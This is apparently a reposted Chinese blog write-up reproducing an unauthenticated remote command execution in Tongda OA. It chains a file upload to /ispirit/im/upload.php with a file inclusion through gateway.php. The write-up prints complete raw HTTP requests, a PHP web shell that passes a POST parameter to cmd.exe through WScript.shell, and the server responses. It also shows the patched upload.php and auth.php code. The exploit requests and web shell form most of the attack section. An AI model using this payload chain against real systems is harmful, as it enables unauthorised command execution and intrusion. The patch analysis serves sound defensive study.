通达oa 不允许从该ip登陆_通达OA-命令执行漏洞复现
通達OA-命令執行
一、環境
安裝文件:
鏈接:https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ 提取碼:2b3i
二、漏洞驗證
任意文件上傳漏洞 /ispirit/im/upload.php
本地文件包含漏洞 /ispirit/interface/gateway.php
這兩個路徑不需要登錄認證。
burp抓包修改數據包上傳文件
POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
上傳成功
查看返回數據包
HTTP/1.1200OKServer: nginxDate: Wed, 18 Mar 2020 12:12:58 GMTContent-Type: text/html; charset=gbkConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID=123; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Frame-Options: SAMEORIGINContent-Length: 41?+OK[vm]143263@2003_1787828218|jpg|0[/vm]
文件包含的filename=2003/1787828218.jpg
繼續修改數據包 包含前面的文件名稱,并且執行系統命令
POST/mac/gateway.phpHTTP/1.1Host: 127.0.0.1:8080Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 74Content-Type: application/x-www-form-urlencoded??json={"url":"/general/../../attach/im/2003/1787828218.jpg"}&cmd=net user
命令執行成功
上面驗證方式是通過burp抓包驗證成功
下面通過python腳本驗證:
成功命令執行
三、修復代碼
補丁修復 /ispirit/im/upload.php
原文件代碼:
set_time_limit(0);
$P = $_POST['P'];
if (isset($P) || $P != '') {
ob_start();
include_once 'inc/session.php';
session_id($P);
session_start();
session_write_close();
} else {
include_once './auth.php';
}
修改后代碼
刪掉了else判斷,直接包含/auth.php
//lp 2012/11/29 1:26:01 兼容客戶端提交數據時無session的情況
if(isset($P) || $P!="")
{
ob_start();
include_once("inc/session.php");
session_id($P);
session_start();
session_write_close();
}
include_once("./auth.php");
auth.php
這里就直接判斷用的是否登錄
include_once 'inc/session.php';
session_start();
session_write_close();
include_once 'inc/conn.php';
include_once 'inc/utility.php';
ob_start();
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
sleep(1);
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
echo '-ERR ' . _('用戶未登陸');
exit;
}
}
四、參考文檔
https://github.com/jas502n/OA-tongda-RCE
https://www.cnblogs.com/potatsoSec/p/12516234.html
?公眾號:
thelostworld:
個人知乎?:https://www.zhihu.com/people/fu-wei-43-69/columns
?個人簡書:https://www.jianshu.com/u/bf0e38a8d400
?
總結
以上是生活随笔為你收集整理的通达oa 不允许从该ip登陆_通达OA-命令执行漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 曾经几乎倒闭的AMD:冲向世界第三!
- 下一篇: 未来计算机论文1500,致未来的自己作文